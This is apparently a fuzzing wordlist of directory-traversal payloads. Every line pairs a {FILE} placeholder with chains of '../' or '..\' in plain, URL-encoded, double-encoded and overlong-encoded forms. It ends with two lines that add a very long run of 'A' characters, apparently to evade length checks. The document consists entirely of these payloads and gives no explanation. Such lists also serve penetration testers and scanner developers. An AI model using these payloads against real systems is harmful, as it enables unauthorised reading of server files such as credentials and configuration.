..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
../{FILE}&lt;br /&gt;
../../{FILE}&lt;br /&gt;
../../../{FILE}&lt;br /&gt;
../../../../{FILE}&lt;br /&gt;
../../../../../{FILE}&lt;br /&gt;
../../../../../../{FILE}&lt;br /&gt;
../../../../../../../{FILE}&lt;br /&gt;
../../../../../../../../{FILE}&lt;br /&gt;
..%2f{FILE}&lt;br /&gt;
..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
..%252f{FILE}&lt;br /&gt;
..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
..\{FILE}&lt;br /&gt;
..\..\{FILE}&lt;br /&gt;
..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..%5c{FILE}&lt;br /&gt;
..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
..%255c{FILE}&lt;br /&gt;
..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
../{FILE}&lt;br /&gt;
../../{FILE}&lt;br /&gt;
../../../{FILE}&lt;br /&gt;
../../../../{FILE}&lt;br /&gt;
../../../../../{FILE}&lt;br /&gt;
../../../../../../{FILE}&lt;br /&gt;
../../../../../../../{FILE}&lt;br /&gt;
../../../../../../../../{FILE}&lt;br /&gt;
..%2f{FILE}&lt;br /&gt;
..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
..%252f{FILE}&lt;br /&gt;
..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
..\{FILE}&lt;br /&gt;
..\..\{FILE}&lt;br /&gt;
..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..%5c{FILE}&lt;br /&gt;
..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
..%255c{FILE}&lt;br /&gt;
..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
\../{FILE}&lt;br /&gt;
\../\../{FILE}&lt;br /&gt;
\../\../\../{FILE}&lt;br /&gt;
\../\../\../\../{FILE}&lt;br /&gt;
\../\../\../\../\../{FILE}&lt;br /&gt;
\../\../\../\../\../\../{FILE}&lt;br /&gt;
\../\../\../\../\../\../\../{FILE}&lt;br /&gt;
\../\../\../\../\../\../\../\../{FILE}&lt;br /&gt;
/..\{FILE}&lt;br /&gt;
/..\/..\{FILE}&lt;br /&gt;
/..\/..\/..\{FILE}&lt;br /&gt;
/..\/..\/..\/..\{FILE}&lt;br /&gt;
/..\/..\/..\/..\/..\{FILE}&lt;br /&gt;
/..\/..\/..\/..\/..\/..\{FILE}&lt;br /&gt;
/..\/..\/..\/..\/..\/..\/..\{FILE}&lt;br /&gt;
/..\/..\/..\/..\/..\/..\/..\/..\{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA